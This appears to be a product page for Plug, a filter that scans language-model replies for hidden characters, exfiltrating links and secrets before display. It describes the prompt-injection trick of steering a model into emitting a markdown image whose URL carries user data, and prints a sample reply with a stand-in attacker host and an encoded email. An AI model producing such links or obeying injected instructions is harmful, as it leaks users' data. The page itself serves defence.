LeakyByte

After the model

Plug

A model reply can carry your data out. Plug closes the exits.

Plug scans what the model wrote for ways data can leave once your app displays it: image links with data in the URL, invisible characters and secrets. It blocks them before anything is rendered.

Try it in your browserSet it upEarly stage. Works locally today.

Try it

The sample reply was steered by an attacker. Edit it, or change which hosts you trust, and see what your app would render. Everything runs in your browser.

1. Model output

2. What Plug found

  • HIDDEN_TEXT
    3 invisible characters removed
  • URL
    tracker.badsite.example is an image from an untrusted host (images load automatically)
  • SECRET
    ANTHROPIC_KEY in output

3. What your app renders

Your order is on the way! ![]([blocked link to tracker.badsite.example]) Docs: https://docs.example.com/shipping?page=2 Ignore this: hidden text sits between the colon and this sentence. Internal key: [removed ANTHROPIC_KEY]

Why use it

When an assistant reads untrusted content, such as an email, a web page or a shared document, that content can contain instructions. One well-known trick tells the model to include a markdown image whose address holds the user data. Your app renders the image, the browser fetches it automatically, and the data reaches the attacker. The user never clicks anything.

a steered reply
Here is your summary!

![](https://tracker.badsite.example/pixel.png?d=ZGFuYS5yZXllc0Bub3J0aHdpbmQuZXhhbXBsZQ==)

The model did what the hidden text said. Nothing in the reply looks broken. Plug looks at the output, sees an image from a host you did not approve with data in its address, and removes it.

What Plug checks

  1. 1

    Hidden characters

    Zero-width characters, text-direction controls and the Unicode tag block are removed. Attackers use them to hide instructions or to smuggle data in text that looks empty.
  2. 2

    Links and images

    Every link is checked. An image from a host you have not listed is always blocked, because images load without a click. Other links are blocked if the address carries data in its query, fragment or login, hides data in the hostname, or has a long encoded blob in the path.
  3. 3

    Secrets in output

    The same detectors as Veil run over the reply. Keys, tokens, emails, card numbers and so on are replaced with [removed KIND].

Plug also reads the way browsers do: uppercase schemes, protocol-relative links, backslashes, HTML-encoded characters, and addresses broken by a tab or newline are all caught.

Set it up

Plug is a small function with no dependencies. It is not on npm yet, so copy lib/plug.ts and lib/redact.ts from the repository into your project, or clone the repository and use the command line tool. Node 22.18 or newer runs the files directly.

terminal
git clone https://github.com/tcvdh/leakybyte.git
cd leakybyte && npm install

In your code

TypeScript
import { plug } from "./lib/plug.ts";

const reply = await getModelReply();           // text from Claude
const { text, findings } = plug(reply, ["cdn.example.com"]);

if (findings.length) console.warn("Plug changed a reply:", findings);
render(text);                                   // render the sanitized text

The second argument lists hosts you trust. Links and images from those hosts pass untouched. The function returns the sanitized text and a list of findings.

From the command line

terminal
$ cat reply.txt | node cli/leakybyte.ts plug --allow docs.example.com

Example

This is real output. The tracking image is blocked, the trusted docs link is untouched, and the key is removed.

Model reply
Your order shipped!
![](https://tracker.badsite.example/pixel.png?d=ZGFuYS5yZXllc0Bub3J0aHdpbmQuZXhhbXBsZQ==)
Docs: https://docs.example.com/shipping
Key: sk-ant-api03-Zk3vQ9xT2mLp8RwYc5HnJd7A
What your app renders, and what Plug reports
Your order shipped!
![]([blocked link to tracker.badsite.example])
Docs: https://docs.example.com/shipping
Key: [removed ANTHROPIC_KEY]

URL: tracker.badsite.example is an image from an untrusted host (images load automatically)
SECRET: ANTHROPIC_KEY in output

Findings

TypeMeaningWhat Plug does
URLA link or image that can carry data out, or an image from an untrusted hostReplaces it with [blocked link to host]
HIDDEN_TEXTInvisible characters in the replyRemoves them
SECRETA key, token or personal detail in the outputReplaces it with [removed KIND]

Pair it with a content security policy

Plug is a filter, and filters can be bypassed. The strongest protection is to stop the browser from loading anything you did not approve. Send a policy like this on the page that shows model output:

HTTP header
Content-Security-Policy: default-src 'self'; img-src 'self' https://cdn.example.com; connect-src 'self'

With that header, even an image that gets past Plug cannot be fetched from an unapproved host. Use both.

Limits to know about

  • Plug works on plain or markdown text. It is not an HTML sanitiser. If you render HTML, also use one.
  • Secret detection also removes emails and phone numbers. If your replies legitimately contain them, Plug will remove them for now. Choosing which kinds to keep is planned.
  • It checks complete text. For streaming replies, check the finished text before the final render. Checking inside a stream is not built yet.
  • It does not follow redirects. A trusted host that redirects elsewhere is still trusted.
  • It is a heuristic filter, not a guarantee. Use it as one layer.

Using Plug on a real project?

Tell us what you are building and what is missing. We read and reply to every message.